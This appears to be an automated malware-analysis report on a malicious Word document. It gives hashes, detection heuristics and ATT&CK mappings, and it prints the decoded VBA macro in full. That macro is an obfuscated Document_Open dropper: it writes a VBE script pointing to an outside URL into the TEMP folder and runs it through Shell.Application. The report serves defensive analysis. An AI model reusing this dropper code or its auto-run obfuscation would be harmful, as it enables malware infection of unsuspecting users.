Office (OLE) malware analysis — malicious · 56b68e35abfac35b

MALICIOUS

Office (OLE)

34.5 KB Created: 2016-03-20 18:37:00 Authoring application: Microsoft Office Word First seen: 2019-02-04

MD5: 038ddddbbc0bd712fa148b388ce738e9 SHA-1: 3f0dc94094d1c80fb8d29860cf778a3a9b236959 SHA-256: 56b68e35abfac35b77bfd65d5ccb9e9003ead4d93bc1bbe28ecb31f83738b528

210 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1566.001 Spearphishing Attachment

The sample contains VBA macros, specifically a Document_Open macro, which is a common technique for initial execution. The macro constructs a path to a temporary file and writes a string containing a URL to it. It then uses CreateObject to execute this file, likely downloading and running a second-stage payload. The ClamAV detection 'Doc.Dropper.Agent-1564641' further supports its malicious nature as a dropper.

Heuristics 7

ClamAV: Doc.Dropper.Agent-1564641 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-1564641
VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Environ() call (env variable access) low OLE_VBA_ENVIRON

Environ() call (env variable access)
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://connect.businesshelpa-z.com/dana/home.php In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1749 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	1749 bytes
SHA-256: `a625b4b8063baf3957433968783a96f759467875d049321c088fac8ae305a30b`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub Document_Open() Dim nbvcxzasd sadasdlonk = "HGFDSEWRF = ""http://connect.businesshelpa-z.com/dana/home.php""" ihasdls = "hel" hasbkj = "dfsdf" saper = "plica" jkbzkxc = ".V" Dim LRnypy As String Dim AylquPK As Integer Dim NESRGxixz As Integer Dim amlriThqqCe As Long Dim RZhMUYS, MKBAavWTAriycfdxu, uwTNIKeu, oEywRhug As String Dim Kct As String Dim gTgHnebIocrnd As Integer Dim hRLehXpUsDThXcWIzyPSP As Integer Dim jbsbBgVZTCCNVQ As Long Dim UveeUk As Single, yMIULwHkqjXQhXdql As Byte, oNEKlftiDYfhtIZR As String, AOqkNrbgWkGcrLg As String If "aTSVMAXZIFmC" = "bBFwK" Then GoTo Qdhvmos Qdhvmos: MsgBox "ELnAcKwVqMVPVuYVahRe", vbCritical, "rUMppvdPwncHXQqpLE" End If Dim yhtgfdcxc As Integer yhtgfdcxc = FreeFile hgvfcdsfdsfff = Environ("TEMP") & "\dsfs" + hasbkj + jkbzkxc + "BE" Open hgvfcdsfdsfff For Output As #yhtgfdcxc Print #yhtgfdcxc, sadasdlonk Print #yhtgfdcxc, UserForm1.TextBox1 Close #yhtgfdcxc Set HGFDSAD = CreateObject("S" + ihasdls + "l.Ap" + saper + "tion") HGFDSAD.Open hgvfcdsfdsfff End Sub Attribute VB_Name = "UserForm1" Attribute VB_Base = "0{3828C63F-042E-4DE1-9B9D-B412647B02B2}{7D07ED3A-5DB4-4208-900C-63002873D5E0}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False

SHA-256: a625b4b8063baf3957433968783a96f759467875d049321c088fac8ae305a30b

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub Document_Open()
Dim nbvcxzasd
sadasdlonk = "HGFDSEWRF = ""http://connect.businesshelpa-z.com/dana/home.php"""
ihasdls = "hel"
hasbkj = "dfsdf"
saper = "plica"
jkbzkxc = ".V"
Dim LRnypy As String
Dim AylquPK As Integer
Dim NESRGxixz As Integer
Dim amlriThqqCe As Long
Dim RZhMUYS, MKBAavWTAriycfdxu, uwTNIKeu, oEywRhug As String
Dim Kct As String
Dim gTgHnebIocrnd As Integer
Dim hRLehXpUsDThXcWIzyPSP As Integer
Dim jbsbBgVZTCCNVQ As Long
Dim UveeUk As Single, yMIULwHkqjXQhXdql As Byte, oNEKlftiDYfhtIZR As String, AOqkNrbgWkGcrLg As String
If "aTSVMAXZIFmC" = "bBFwK" Then
GoTo Qdhvmos
Qdhvmos:
MsgBox "ELnAcKwVqMVPVuYVahRe", vbCritical, "rUMppvdPwncHXQqpLE"
End If
     Dim yhtgfdcxc As Integer
     yhtgfdcxc = FreeFile
          hgvfcdsfdsfff = Environ("TEMP") & "\dsfs" + hasbkj + jkbzkxc + "BE"
          
    Open hgvfcdsfdsfff For Output As #yhtgfdcxc
    Print #yhtgfdcxc, sadasdlonk
    Print #yhtgfdcxc, UserForm1.TextBox1
            Close #yhtgfdcxc
            
Set HGFDSAD = CreateObject("S" + ihasdls + "l.Ap" + saper + "tion")
HGFDSAD.Open hgvfcdsfdsfff
End Sub


Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{3828C63F-042E-4DE1-9B9D-B412647B02B2}{7D07ED3A-5DB4-4208-900C-63002873D5E0}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Open this report in the interactive analyzer, or submit your own file for analysis.